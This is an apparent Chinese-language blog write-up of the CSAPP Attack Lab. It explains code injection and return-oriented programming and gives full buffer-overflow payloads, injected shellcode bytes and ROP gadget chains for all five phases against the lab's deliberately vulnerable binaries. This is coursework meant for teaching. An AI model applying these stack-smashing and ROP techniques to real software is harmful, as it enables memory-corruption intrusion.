<!DOCTYPE html><html lang="zh-CN" data-theme="light"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width,initial-scale=1"><title>CSAPP:Attack lab | Autumn-Cat</title><meta name="description" content="Attack预备知识目标该实验的目标是使用CI（Code injection）和ROP（Return-oriented programming）技术来进行攻击，使得程序跳转到你想要的函数中去，如下图所示：  其中，各个文件作用如下：  ctarget：CI攻击用 rtarget：rop攻击用 hex2raw：16进制转字符串用  附：在执行ctarget或rtarget时需要加上-q选项，以免ho"><meta name="keywords" content="CSAPP"><meta name="author" content="Autumn-Cat"><meta name="copyright" content="Autumn-Cat"><meta name="format-detection" content="telephone=no"><link rel="shortcut icon" href="/my_img/favicon3.png"><link rel="canonical" href="http://yoursite.com/2019/12/02/CSAPP-lab3/"><meta http-equiv="Cache-Control" content="no-transform"><meta http-equiv="Cache-Control" content="no-siteapp"><link rel="preconnect" href="//cdn.jsdelivr.net"/><link rel="preconnect" href="//fonts.googleapis.com" crossorigin="crossorigin"/><link rel="preconnect" href="//busuanzi.ibruce.info"/><meta name="google-site-verification" content="VphQSMPLUZtXoOs-G7x6FwxvVQ4MadgXTwNZrQIHkK8"/><meta name="baidu-site-verification" content="14465c5faf8b82ac413e3bbbecd83e06"/><meta property="og:type" content="article"><meta property="og:title" content="CSAPP:Attack lab"><meta property="og:url" content="http://yoursite.com/2019/12/02/CSAPP-lab3/"><meta property="og:site_name" content="Autumn-Cat"><meta property="og:description" content="Attack预备知识目标该实验的目标是使用CI（Code injection）和ROP（Return-oriented programming）技术来进行攻击，使得程序跳转到你想要的函数中去，如下图所示：  其中，各个文件作用如下：  ctarget：CI攻击用 rtarget：rop攻击用 hex2raw：16进制转字符串用  附：在执行ctarget或rtarget时需要加上-q选项，以免ho"><meta property="og:image" content="https://source.unsplash.com/random/500x500/?nature"><meta property="article:published_time" content="2019-12-02T08:38:42.000Z"><meta property="article:modified_time" content="2020-08-28T09:24:47.447Z"><meta name="twitter:card" content="summary"><script><!-- hexo-inject:begin --><!-- hexo-inject:end -->var activateDarkMode = function () {
  document.documentElement.setAttribute('data-theme', 'dark')
  if (document.querySelector('meta[name="theme-color"]') !== null) {
    document.querySelector('meta[name="theme-color"]').setAttribute('content', '#000')
  }
}
var activateLightMode = function () {
  document.documentElement.setAttribute('data-theme', 'light')
  if (document.querySelector('meta[name="theme-color"]') !== null) {
    document.querySelector('meta[name="theme-color"]').setAttribute('content', '#fff')
  }
}

var getCookies = function (name) {
  const value = `; ${document.cookie}`
  const parts = value.split(`; ${name}=`)
  if (parts.length === 2) return parts.pop().split(';').shift()
}

var autoChangeMode = 'false'
var t = getCookies('theme')
if (autoChangeMode === '1') {
  var isDarkMode = window.matchMedia('(prefers-color-scheme: dark)').matches
  var isLightMode = window.matchMedia('(prefers-color-scheme: light)').matches
  var isNotSpecified = window.matchMedia('(prefers-color-scheme: no-preference)').matches
  var hasNoSupport = !isDarkMode && !isLightMode && !isNotSpecified

  if (t === undefined) {
    if (isLightMode) activateLightMode()
    else if (isDarkMode) activateDarkMode()
    else if (isNotSpecified || hasNoSupport) {
      console.log('You specified no preference for a color scheme or your browser does not support it. I Schedule dark mode during night time.')
      var now = new Date()
      var hour = now.getHours()
      var isNight = hour <= 6 || hour >= 18
      isNight ? activateDarkMode() : activateLightMode()
    }
    window.matchMedia('(prefers-color-scheme: dark)').addListener(function (e) {
      if (Cookies.get('theme') === undefined) {
        e.matches ? activateDarkMode() : activateLightMode()
      }
    })
  } else if (t === 'light') activateLightMode()
  else activateDarkMode()
} else if (autoChangeMode === '2') {
  now = new Date()
  hour = now.getHours()
  isNight = hour <= 6 || hour >= 18
  if (t === undefined) isNight ? activateDarkMode() : activateLightMode()
  else if (t === 'light') activateLightMode()
  else activateDarkMode()
} else {
  if (t === 'dark') activateDarkMode()
  else if (t === 'light') activateLightMode()
}</script><link rel="stylesheet" href="/css/index.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free/css/all.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.css"><link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Titillium+Web&amp;display=swap"><script>var GLOBAL_CONFIG = { 
  root: '/',
  hexoversion: '5.1.1',
  algolia: undefined,
  localSearch: undefined,
  translate: undefined,
  noticeOutdate: undefined,
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  },
  bookmark: {
    message_prev: '按',
    message_next: '键将本页加入书签'
  },
  runtime_unit: '天',
  runtime: false,
  copyright: undefined,
  ClickShowText: undefined,
  medium_zoom: false,
  fancybox: true,
  Snackbar: undefined,
  justifiedGallery: {
    js: 'https://cdn.jsdelivr.net/npm/justifiedGallery/dist/js/jquery.justifiedGallery.min.js',
    css: 'https://cdn.jsdelivr.net/npm/justifiedGallery/dist/css/justifiedGallery.min.css'
  },
  baiduPush: false,
  highlightCopy: true,
  highlightLang: true,
  isPhotoFigcaption: false,
  islazyload: true,
  isanchor: false    
}</script><script id="config_change">var GLOBAL_CONFIG_SITE = { 
  isPost: true,
  isHome: false,
  isHighlightShrink: false,
  isSidebar: true,
  postUpdate: '2020-08-28 17:24:47'
}</script><noscript><style>
#nav {
  opacity: 1
}
.justified-gallery img {
  opacity: 1
}
</style></noscript><!-- hexo injector head_end start -->
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/katex@0.12.0/dist/katex.min.css">

<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/hexo-math@4.0.0/dist/style.css">
<!-- hexo injector head_end end --><meta name="generator" content="Hexo 5.1.1"><!-- hexo-inject:begin --><!-- hexo-inject:end --></head><body><div id="mobile-sidebar"><div id="menu_mask"></div><div id="mobile-sidebar-menus"><div class="mobile_author_icon"><img class="avatar-img" data-lazy-src="/my_img/avatar.png" onerror="onerror=null;src='/img/friend_404.gif'" alt="avatar"/></div><div class="mobile_post_data"><div class="mobile_data_item is-center"><div class="mobile_data_link"><a href="/archives/"><div class="headline">文章</div><div class="length_num">33</div></a></div></div><div class="mobile_data_item is-center">      <div class="mobile_data_link"><a href="/tags/"><div class="headline">标签</div><div class="length_num">13</div></a></div></div><div class="mobile_data_item is-center">     <div class="mobile_data_link"><a href="/categories/"><div class="headline">分类</div><div class="length_num">3</div></a></div></div></div><hr/><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i><span> Home</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fas fa-archive"></i><span> Archives</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fas fa-tags"></i><span> Tags</span></a></div></div></div></div><div id="body-wrap"><div id="sidebar"><i class="fas fa-arrow-right on" id="toggle-sidebar"></i><div class="sidebar-toc"><div class="sidebar-toc__title">目录</div><div class="sidebar-toc__progress"><span class="progress-notice">你已经读了</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar">     </div></div><div class="sidebar-toc__content"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#Attack"><span class="toc-number">1.</span> <span class="toc-text">Attack</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E9%A2%84%E5%A4%87%E7%9F%A5%E8%AF%86"><span class="toc-number">1.1.</span> <span class="toc-text">预备知识</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%9B%AE%E6%A0%87"><span class="toc-number">1.1.1.</span> <span class="toc-text">目标</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#CI"><span class="toc-number">1.1.2.</span> <span class="toc-text">CI</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#ROP"><span class="toc-number">1.1.3.</span> <span class="toc-text">ROP</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%A7%A3%E9%A2%98%E6%8A%A5%E5%91%8A"><span class="toc-number">1.2.</span> <span class="toc-text">解题报告</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#CI-phase1"><span class="toc-number">1.2.1.</span> <span class="toc-text">CI : phase1</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#CI-phase2"><span class="toc-number">1.2.2.</span> <span class="toc-text">CI : phase2</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#CI-phase3"><span class="toc-number">1.2.3.</span> <span class="toc-text">CI : phase3</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#ROP-phase4"><span class="toc-number">1.2.4.</span> <span class="toc-text">ROP : phase4</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#ROP-phase5"><span class="toc-number">1.2.5.</span> <span class="toc-text">ROP : phase5</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E9%99%84%E5%BD%95"><span class="toc-number">1.3.</span> <span class="toc-text">附录</span></a></li></ol></li></ol></div></div></div><header class="post-bg" id="page-header" style="background-image: url(https://source.unsplash.com/random/500x500/?nature)"><nav id="nav"><span class="pull-left" id="blog_name"><a class="blog_title" id="site-name" href="/">Autumn-Cat</a></span><span class="pull-right menus"><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i><span> Home</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fas fa-archive"></i><span> Archives</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fas fa-tags"></i><span> Tags</span></a></div></div><span class="toggle-menu close"><a class="site-page"><i class="fas fa-bars fa-fw"></i></a></span></span></nav><div id="post-info"><div id="post-title"><div class="posttitle">CSAPP:Attack lab</div></div><div id="post-meta"><div class="meta-firstline"><span class="post-meta-date"><i class="far fa-calendar-alt fa-fw post-meta-icon"></i><span class="post-meta-label">发表于</span><time class="post-meta-date-created" datetime="2019-12-02T08:38:42.000Z" title="发表于 2019-12-02 16:38:42">2019-12-02</time><span class="post-meta-separator">|</span><i class="fas fa-history fa-fw post-meta-icon"></i><span class="post-meta-label">更新于</span><time class="post-meta-date-updated" datetime="2020-08-28T09:24:47.447Z" title="更新于 2020-08-28 17:24:47">2020-08-28</time></span></div><div class="meta-secondline"> <span class="post-meta-separator">|</span><span class="post-meta-pv-cv"><i class="far fa-eye fa-fw post-meta-icon"></i><span class="post-meta-label">阅读量:</span><span id="busuanzi_value_page_pv"></span></span></div></div></div></header><main class="layout_post" id="content-inner"><article id="post"><div class="post-content" id="article-container"><h1 id="Attack"><a href="#Attack" class="headerlink" title="Attack"></a>Attack</h1><h2 id="预备知识"><a href="#预备知识" class="headerlink" title="预备知识"></a>预备知识</h2><h3 id="目标"><a href="#目标" class="headerlink" title="目标"></a>目标</h3><p>该实验的目标是使用CI（Code injection）和ROP（Return-oriented programming）技术来进行攻击，使得程序跳转到你想要的函数中去，如下图所示：</p>
<!-- hexo-inject:begin --><!-- hexo-inject:end --><p><img src= "/img/loading.gif" data-lazy-src="https://raw.githubusercontent.com/XieJiann/imgHost/master/blog/CSAPP-lab3/14554126934270.jpg" alt="img"></p>
<p>其中，各个文件作用如下：</p>
<ul>
<li>ctarget：CI攻击用</li>
<li>rtarget：rop攻击用</li>
<li>hex2raw：16进制转字符串用</li>
</ul>
<p>附：在执行ctarget或rtarget时需要加上-q选项，以免host 报错</p>
<h3 id="CI"><a href="#CI" class="headerlink" title="CI"></a>CI</h3><p>CI，即代码注入。</p>
<p>在C语言中，假如A调用了B，其具体流程如下：</p>
<ul>
<li>A保存自己的状态（一些寄存器）</li>
<li>A保存自己的地址，并将IP指向B运行的地址</li>
<li>B申请自己的栈帧</li>
<li>B运行结束，释放栈帧（sp-x），并pop出返回地址，赋给<br>IP（ret）</li>
</ul>
<p><img src= "/img/loading.gif" data-lazy-src="https://raw.githubusercontent.com/XieJiann/imgHost/master/blog/CSAPP-lab3/image-20191202165456985.png" alt="image-20191202165456985"></p>
<p>由于C语言是不作堆栈保护的，所以B函数的写入可能覆盖掉B的返回地址（在B的帧中，栈使用方向是自底向上），返回到我们想要的地址中去。</p>
<p>更危险的是，我们还可以在栈中写入可执行代码，使得B返回并执行我们写的代码。</p>
<p>有意思的是覆盖只和B的申请空间有关，和A、B中具体的代码内容无关。</p>
<h3 id="ROP"><a href="#ROP" class="headerlink" title="ROP"></a>ROP</h3><p>在程序中，有两种方法可以保护栈免受攻击：</p>
<ul>
<li>栈随机化：在每次程序开始运行时，随机分配一个空间，使得栈的地址每次运行都是不同的。这样的话，我们就没有办法准确确定跳转地址（附：可以用相对寻址）</li>
<li>栈中的代码是不可执行的</li>
</ul>
<p>那么这样我们只能另辟蹊径，去找代码区符合我们需要的可执行代码去执行。有时候找不到我们需要的，这时候就需要我们自己凑数据。</p>
<p>一些常用的汇编指令的编码如下：</p>
<table>
<thead>
<tr>
<th>指令</th>
<th>编码</th>
</tr>
</thead>
<tbody><tr>
<td>retq</td>
<td>0xc3</td>
</tr>
<tr>
<td>nop</td>
<td>0x90</td>
</tr>
</tbody></table>
<p><img src= "/img/loading.gif" data-lazy-src="https://raw.githubusercontent.com/XieJiann/imgHost/master/blog/CSAPP-lab3/image-20200828172143753.png" alt="image-20200828172143753"></p>
<p><img src= "/img/loading.gif" data-lazy-src="https://raw.githubusercontent.com/XieJiann/imgHost/master/blog/CSAPP-lab3/image-20200828172215196.png" alt="image-20200828172215196"></p>
<p><img src= "/img/loading.gif" data-lazy-src="https://raw.githubusercontent.com/XieJiann/imgHost/master/blog/CSAPP-lab3/image-20200828172250007.png"></p>
<h2 id="解题报告"><a href="#解题报告" class="headerlink" title="解题报告"></a>解题报告</h2><h3 id="CI-phase1"><a href="#CI-phase1" class="headerlink" title="CI : phase1"></a>CI : phase1</h3><p>在phase1中，我们希望test函数在调用getbuf后可以返回touch1</p>
<p>getbuf的汇编代码：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">00000000004017a8 &lt;getbuf&gt;:</span><br><span class="line">  4017a8:	48 83 ec 28          	sub    $0x28,%rsp</span><br><span class="line">  4017ac:	48 89 e7             	mov    %rsp,%rdi</span><br><span class="line">  4017af:	e8 8c 02 00 00       	callq  401a40 &lt;Gets&gt;</span><br><span class="line">  4017b4:	b8 01 00 00 00       	mov    $0x1,%eax</span><br><span class="line">  4017b9:	48 83 c4 28          	add    $0x28,%rsp</span><br><span class="line">  4017bd:	c3                   	retq   </span><br><span class="line">  4017be:	90                   	nop</span><br><span class="line">  4017bf:	90                   	nop</span><br></pre></td></tr></table></figure>

<p>由汇编代码可以得到，getbuf申请了0x28 字节的空间，我们只需覆盖这些空间并重写返回地址即可，touch1的起始地址是：0x004017c0</p>
<p>故答案是：（注意小端）</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">00 00 00 00 00 00 00 00 </span><br><span class="line">00 00 00 00 00 00 00 00</span><br><span class="line">00 00 00 00 00 00 00 00</span><br><span class="line">00 00 00 00 00 00 00 00</span><br><span class="line">00 00 00 00 00 00 00 00</span><br><span class="line">c0 17 40 00 00 00 00 00  ;覆盖的地址</span><br></pre></td></tr></table></figure>

<p>注意地址那一段需要转换为字符串，因为输入是ascill码。</p>
<h3 id="CI-phase2"><a href="#CI-phase2" class="headerlink" title="CI : phase2"></a>CI : phase2</h3><p>phase2的要求便是跳转到touch2，touch2的代码如下：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">touch2</span><span class="params">(<span class="keyword">unsigned</span> val)</span></span>&#123;</span><br><span class="line">    vlevel = <span class="number">2</span>;</span><br><span class="line">    <span class="keyword">if</span> (val == cookie)&#123;</span><br><span class="line">        <span class="built_in">printf</span>(<span class="string">&quot;Touch2!: You called touch2(0x%.8x)\n&quot;</span>, val);</span><br><span class="line">        validate(<span class="number">2</span>);</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="built_in">printf</span>(<span class="string">&quot;Misfire: You called touch2(0x%.8x)\n&quot;</span>, val);</span><br><span class="line">        fail(<span class="number">2</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="built_in">exit</span>(<span class="number">0</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>所以比phase1多的一个要求就是我们在跳转到touch2之前需要传递参数。</p>
<p>实现的步骤如下：</p>
<ul>
<li>将传参的代码注入栈中，通过gets方法</li>
<li>跳转到栈的代码处，执行栈中的代码</li>
<li>再返回到touch2函数处</li>
</ul>
<p>注入代码如下：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">mov $0x45374fee,%rdi</span><br><span class="line">pushq $0x401860</span><br><span class="line">ret</span><br></pre></td></tr></table></figure>

<p>注：ret 指令将sp指向的地址作为返回地址，所以这里pushq指令使得sp指向touch2的地址，即使得函数返回到touch2中。</p>
<p>接下来便是解的时刻：</p>
<p>首先，利用gdb确定sp的位置：</p>
<p><img src= "/img/loading.gif" data-lazy-src="https://raw.githubusercontent.com/XieJiann/imgHost/master/blog/CSAPP-lab3/image-20200828172055650.png" alt="image-20200828172055650"></p>
<p>然后，注入代码并覆盖掉返回地址，使其返回到sp处：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">0x5561dca0:</span><br><span class="line">48 c7 c7 fa 97 b9 59        ;mov    $0x59b997fa,%rdi</span><br><span class="line">68 ec 17 40 00              ;pushq  $0x4017ec 第二次返回的地址压栈   </span><br><span class="line">c3                          ;retq                   </span><br><span class="line">00 00 00</span><br><span class="line">00 00 00 00 00 00 00 00</span><br><span class="line">00 00 00 00 00 00 00 00</span><br><span class="line">00 00 00 00 00 00 00 00</span><br><span class="line">78 dc 61 55 00 00 00 00		;返回地址    </span><br></pre></td></tr></table></figure>

<p>最后，便可以等程序带着参数返回到touch2函数了</p>
<h3 id="CI-phase3"><a href="#CI-phase3" class="headerlink" title="CI : phase3"></a>CI : phase3</h3><p>touch3的代码如下：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">hexmatch</span><span class="params">(<span class="keyword">unsigned</span> val, <span class="keyword">char</span> *sval)</span></span>&#123;</span><br><span class="line">    <span class="keyword">char</span> cbuf[<span class="number">110</span>];</span><br><span class="line">    <span class="keyword">char</span> *s = cbuf + random() % <span class="number">100</span>;</span><br><span class="line">    <span class="built_in">sprintf</span>(s, <span class="string">&quot;%.8x&quot;</span>, val);</span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">strncmp</span>(sval, s, <span class="number">9</span>) == <span class="number">0</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">touch3</span><span class="params">(<span class="keyword">char</span> *sval)</span></span>&#123;</span><br><span class="line">    vlevel = <span class="number">3</span>;</span><br><span class="line">    <span class="keyword">if</span> (hexmatch(cookie, sval))&#123;</span><br><span class="line">        <span class="built_in">printf</span>(<span class="string">&quot;Touch3!: You called touch3(\&quot;%s\&quot;)\n&quot;</span>, sval);</span><br><span class="line">        validate(<span class="number">3</span>);</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="built_in">printf</span>(<span class="string">&quot;Misfire: You called touch3(\&quot;%s\&quot;)\n&quot;</span>, sval);</span><br><span class="line">        fail(<span class="number">3</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="built_in">exit</span>(<span class="number">0</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>由代码可知是将我们传入的字符串参数和cookie作比较，使得他们前9个字符（最后一个00）相等</p>
<p>cookie字符串的asicll代码是：“59b997fa” =   35 39 62 39 39 37 66 61 00</p>
<p>所以我们需要做的就是把“59b997fa”存放在栈的某处，并将地址作为参数（赋值给rdi）。</p>
<p>在phase2中，我们是将参数放在了缓冲区中，然而这次却不行。因为在getbuf返回之后，理论上getbuf的栈帧是被销毁了的，新调用的hexmatch()申请的栈帧会包括原缓冲区，所以可能会覆盖我们的参数。</p>
<p>所以，我们可以考虑在test的栈帧中放置参数（因为test函数之后不会再使用了，所以覆盖掉test栈帧中的信息也没有关系）。</p>
<p>由此我们便可以得到我们的答案，和phase2很像，其中关键是字符串放置的位置和传地址：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">48 c7 c7 a8 dc 61 55            ;mov    $0x5561dca8,%rdi</span><br><span class="line">68 fa 18 40 00                  ;pushq  $0x4018fa  第二次返回的地址压栈</span><br><span class="line">c3                              ;retq</span><br><span class="line">00 00 00</span><br><span class="line">00 00 00 00 00 00 00 00</span><br><span class="line">00 00 00 00 00 00 00 00</span><br><span class="line">00 00 00 00 00 00 00 00</span><br><span class="line">78 dc 61 55 00 00 00 00         ;返回地址</span><br><span class="line">35 39 62 39 39 37 66 61 00      ;“59b997fa”</span><br></pre></td></tr></table></figure>

<h3 id="ROP-phase4"><a href="#ROP-phase4" class="headerlink" title="ROP : phase4"></a>ROP : phase4</h3><p>phase4还是让我们调用touch2，我们的目标如下：</p>
<ul>
<li>将cookie作为参数传入%rdi</li>
<li>调用touch2函数</li>
</ul>
<p>rtarget将查找范围限定在start_farm ~ mid_farm之间，所以这使得查找更加容易</p>
<p>首先，我们需要在汇编文件中查找popq %rdi指令，其编码为5f，然而并没有符合要求的。</p>
<p>所以我们曲线救国，用两个指令组合出pop %rdi的效果（这里%rax可以用其他代替，但是经过查找只有%rax符合要求）：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">pop %rax ;58</span><br><span class="line">movq %rax,%rdi;48 89 c7</span><br></pre></td></tr></table></figure>

<p>所以我们查找58，发现在0x4019cc处的编码符合要求：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">58:pop %ra</span><br><span class="line">90:nop</span><br><span class="line">c3:retq</span><br></pre></td></tr></table></figure>

<p>接下来便是查找48 89 c7，发现0x4019c5处的编码符合要求：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">48 89 c7:movq %rax,%rdi</span><br><span class="line">90:nop</span><br><span class="line">c3:retq</span><br></pre></td></tr></table></figure>

<p>所以我们需要使得程序先返回到0x4019cc处，然后再返回到0x4019c5，最后返回到touch3处。由此便可以得到答案：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">00 00 00 00 00 00 00 00 </span><br><span class="line">00 00 00 00 00 00 00 00</span><br><span class="line">00 00 00 00 00 00 00 00</span><br><span class="line">00 00 00 00 00 00 00 00</span><br><span class="line">00 00 00 00 00 00 00 00</span><br><span class="line">cc 19 40 00 00 00 00 00  ;第一次返回的地址</span><br><span class="line">fa 97 b9 59 00 00 00 00  ;cookie</span><br><span class="line">c5 19 40 00 00 00 00 00  ;第二次返回的地址</span><br><span class="line">ec 17 40 00 00 00 00 00	 ;touch2地址</span><br></pre></td></tr></table></figure>



<h3 id="ROP-phase5"><a href="#ROP-phase5" class="headerlink" title="ROP : phase5"></a>ROP : phase5</h3><p>由phase3的分析可以得到，我们在phase5中需要存放字符串，并把字符串的地址传给%rdi</p>
<p>所以，我们只需要在phase基础上，把cookie改成地址，并且把字符串存放在栈的最底端（touch2地址下）。不过有一个问题是由于栈随机化，所以我们需要通过相对寻址计算字符串的地址，在将其传入到%rdi中。</p>
<p>经过查看，在fram中有函数为：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">00000000004019d6 &lt;add_xy&gt;:</span><br><span class="line">  4019d6:	48 8d 04 37          	lea    (%rdi,%rsi,1),%rax ;%rax &#x3D; %rsi + %rdi</span><br><span class="line">  4019da:	c3                   	retq   </span><br></pre></td></tr></table></figure>

<p>所以我们的目标就是，想办法拼凑指令把%rsp 和 offset 分别赋值给%rsi 和 %rdi。 </p>
<p>拼凑的过程太繁琐了，这里我就直接抄出答案：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">00 00 00 00 00 00 00 00</span><br><span class="line">00 00 00 00 00 00 00 00</span><br><span class="line">00 00 00 00 00 00 00 00</span><br><span class="line">00 00 00 00 00 00 00 00</span><br><span class="line">00 00 00 00 00 00 00 00</span><br><span class="line">06 1a 40 00 00 00 00 00     ;0x401a06: movq %rsp, %rax</span><br><span class="line">c5 19 40 00 00 00 00 00     ;0x4019c5: movq %rax, %rdi</span><br><span class="line">ab 19 40 00 00 00 00 00     ;0x4019ab: popq %rax</span><br><span class="line">48 00 00 00 00 00 00 00     ;offset</span><br><span class="line">dd 19 40 00 00 00 00 00     ;0x4019dd: movl %eax, %edx</span><br><span class="line">34 1a 40 00 00 00 00 00     ;0x401a34: movl %edx, %ecx</span><br><span class="line">13 1a 40 00 00 00 00 00     ;0x401a13: movl %ecx, %esi</span><br><span class="line">d6 19 40 00 00 00 00 00     ;0x4019d6: lea (%rdi,%rsi,1),%rax</span><br><span class="line">c5 19 40 00 00 00 00 00     ;0x4019c5: movq %rax, %rdi</span><br><span class="line">fa 18 40 00 00 00 00 00     ;touch3</span><br><span class="line">35 39 62 39 39 37 66 61 00  ;cookie string</span><br></pre></td></tr></table></figure>



<h2 id="附录"><a href="#附录" class="headerlink" title="附录"></a>附录</h2><p>常用寄存器一览</p>
<p><img src= "/img/loading.gif" data-lazy-src="https://raw.githubusercontent.com/XieJiann/imgHost/master/blog/CSAPP-lab3/image-20191120203820837.png"></p>
<p>参考博客：<a target="_blank" rel="noopener" href="https://wdxtub.com/csapp/thick-csapp-lab-3/2016/04/16/">https://wdxtub.com/csapp/thick-csapp-lab-3/2016/04/16/</a></p>
</div><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">文章作者: </span><span class="post-copyright-info"><a href="mailto:undefined">Autumn-Cat</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">文章链接: </span><span class="post-copyright-info"><a href="http://yoursite.com/2019/12/02/CSAPP-lab3/">http://yoursite.com/2019/12/02/CSAPP-lab3/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" target="_blank">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="http://yoursite.com" target="_blank">Autumn-Cat</a>！</span></div></div><div class="tag_share"><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/CSAPP/">CSAPP</a></div><div class="post_share"><div class="social-share" data-image="https://source.unsplash.com/random/500x500/?nature" data-sites="facebook,twitter,wechat,weibo,qq"></div><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/social-share.js/dist/css/share.min.css"><script src="https://cdn.jsdelivr.net/npm/social-share.js/dist/js/social-share.min.js" defer></script></div></div><nav class="pagination-post" id="pagination"><div class="prev-post pull-left"><a href="/2019/12/03/%E4%BD%8D%E8%BF%90%E7%AE%97/"><img class="prev-cover" data-lazy-src="https://source.unsplash.com/random/500x500/?flower" onerror="onerror=null;src='/img/404.jpg'"><div class="pagination-info"><div class="label">上一篇</div><div class="prev_info">位运算</div></div></a></div><div class="next-post pull-right"><a 